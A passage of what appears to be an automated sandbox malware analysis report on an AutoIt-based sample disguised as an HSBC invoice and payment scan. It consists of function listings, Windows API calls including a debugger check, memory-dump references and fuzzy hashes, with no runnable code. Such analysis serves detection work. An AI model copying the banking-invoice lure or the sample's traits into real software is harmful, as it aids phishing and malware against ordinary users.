                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                    • Instruction ID: c4c52cfd5499096baf7df2a4ecbda51faafa41ca52128c7d4a6750377c8241c7
                    • Opcode Fuzzy Hash: 7dc327e689e4d17ed3e6073365c6d6228015562bace77012c6cb1af1071a579f
                    • Instruction Fuzzy Hash: 021106B0501229BADB248F518C95EFBFF68FF05355F10912EF70566040D3709945E6F2
                    Function 00EF80A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EF830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EF80C8,?,00000000,?,?), ref: 00EF8322
                    • inet_addr.WS2_32(00000000), ref: 00EF80CB
                    • htons.WS2_32(00000000), ref: 00EF8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                    • Instruction ID: aa57a58eee1b19afafb4151dd965955abe902a825c38745c48d9e1085d8df0f6
                    • Opcode Fuzzy Hash: fd636bc1562f67b99bc8969edf676a54e6a807bdc7366861d61a1ce4a74703c9
                    • Instruction Fuzzy Hash: FC11E535200209ABDB20AF64CD46FFEB364FF04324F109627EA15B7291DF71A805C751
                    Function 00ED92E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00ED9355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                    • Instruction ID: 566a32f60a4d24de23741cf861458d5ce7a7c374a802618a895e615e2e1e4479
                    • Opcode Fuzzy Hash: 92161c7217e280713971fc84d4f4ab21de4d78f4fe759c981e081e3b911ff133
                    • Instruction Fuzzy Hash: D301D271A05214ABCB04FB60CC918FE73A9FF06320B14261AB976773D2DB3198089750
                    Function 00ED91DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00ED924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                    • Instruction ID: 2e27bc6561aae45ac9e85002e92e2336908833457bb8557dbd51ef927b8b4793
                    • Opcode Fuzzy Hash: c12793a43875d0bd2b4636b3e1ca762a9b5322cc3ed53355388120825365f4f8
                    • Instruction Fuzzy Hash: 3F01B171A41108ABCB18FBA0C9929EE73E8EF05700F24201AB91A73292EA519E099261
                    Function 00ED9264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00EDB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00EDB0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00ED92D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                    • Instruction ID: b70bdd22ad1fa4a1a04ee45adae530d39773867cd655d36aa76e8abca063edf8
                    • Opcode Fuzzy Hash: aea556cde3f62b55b8cea3356f03e5d1cdacdfac134f10fe5acc70fe3be80b92
                    • Instruction Fuzzy Hash: 4E01A771A45108B7CB14FAA0CD82DFF77ECDF11710F242116791A73292DB619E0D9271
                    Function 00EE51CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                    • Instruction ID: b6e962322e76f6d18968816a71accde0b86be06bb28d58dffdcb13bb562f2778
                    • Opcode Fuzzy Hash: 6b4aa6191b8379778273db994dbd6027c667d58647b9b04758029d62d42f6e1e
                    • Instruction Fuzzy Hash: 16E0D17390432D17D7209A969C45F97F7ECEB55771F000157FD14D7050D660E94587D1
                    Function 00ED81BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                    Download Yara Rule
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00ED81CA
                      • Part of subcall function 00EA3598: _doexit.LIBCMT ref: 00EA35A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: ab6a9100929dff62d425a011db969d1e00a2c93171ac064ba2333b74f9e48141
                    • Instruction ID: 411e81d5640060fc34662775db4e313528688eeced99defcd63e0359d49d8ca2
                    • Opcode Fuzzy Hash: ab6a9100929dff62d425a011db969d1e00a2c93171ac064ba2333b74f9e48141
                    • Instruction Fuzzy Hash: 63D05B323C531D36D21532B86D07FC676C88B09B55F005056BB0C795D38DD2D9D252DA
                    Function 00EBB511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EBB564: _memset.LIBCMT ref: 00EBB571
                      • Part of subcall function 00EA0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00F45158,00000000,00F45144,00EBB540,?,?,?,00E8100A), ref: 00EA0B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,00E8100A), ref: 00EBB544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E8100A), ref: 00EBB553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EBB54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                    • Instruction ID: d33715bc77601c7321cb5f0b3b16dc9631a8965eaf59ae5fa21f921af6a9d119
                    • Opcode Fuzzy Hash: d16fe9ec3f546b76e7e578116dfaad31bc38cd4506517fa84b069e215271830e
                    • Instruction Fuzzy Hash: 6AE06D702007148FD770DF68E5043837BE4AF04714F00892CE48AD6651D7F4E508DB62
                    Function 00F05BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                    Download Yara Rule
                    APIs
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F05BF5
                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F05C08
                      • Part of subcall function 00EE54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: FindMessagePostSleepWindow
                    • String ID: Shell_TrayWnd
                    • API String ID: 529655941-2988720461
                    • Opcode ID: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                    • Instruction ID: e984906d0f86ac1392c1b94d40bf75fb5ef4cb100b1b42e4293a0de04972089e
                    • Opcode Fuzzy Hash: 673fe05ea50f03db7f18c930a8afc85518e1d40aa70ce6a39463b0c6a5affc00
                    • Instruction Fuzzy Hash: 50D01232388315B7E778BB71AC0FFE77A54BB10B55F140839B756AA1D0D9E49804D650